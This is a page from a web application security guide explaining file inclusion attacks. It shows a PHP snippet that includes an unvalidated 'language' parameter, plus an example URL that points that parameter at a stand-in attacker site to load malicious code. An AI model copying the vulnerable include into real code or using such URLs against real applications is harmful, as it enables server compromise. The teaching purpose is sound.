Web application security - the fast guide 1.1 | Page 142

Chapter 7 - Attack execution (3)
P a g e | 142
Code code code code code
code code Code code code
code code code code Code
code code code code code
code Code code code code
code code code Code code
code code code code code
Malicious
code code
Code code code code code
code code Code code code
code code code code Code
code code code code code
Attack process
The attacker in that type of attack focus on the code that dynamically loads or
import a local or external code.
The main idea is to manipulate the parameters to make the same code import an
external malicious code.
The following listing is the URL for application that accepts a parameter
language to load the related localization file
https://myapplication.com/index.php?language=en
the page will import the localization file depending on the entered parameter
$language = $_GET[‘language’];
include( $language . ‘.php’ );
As noticed there is no special validation for the language parameter which will
give the attacker the ability to use any value for the language parameter, a
malicious attack can be initiated with the following page call
https://myapplication.com/index.php?language=http://attackersite.com/pageC
ontainingMaliciousCode
if external files could not be included even the ability to import any local file
available on the server can represent a real issue because that might help the
attacker to access or compromise a restricted resource just by including it.
moreover, Local inclusion also can be used to include a library or functionality
available in a local file inside another file which might give the attacker the
ability to execute those functionalities on the container file.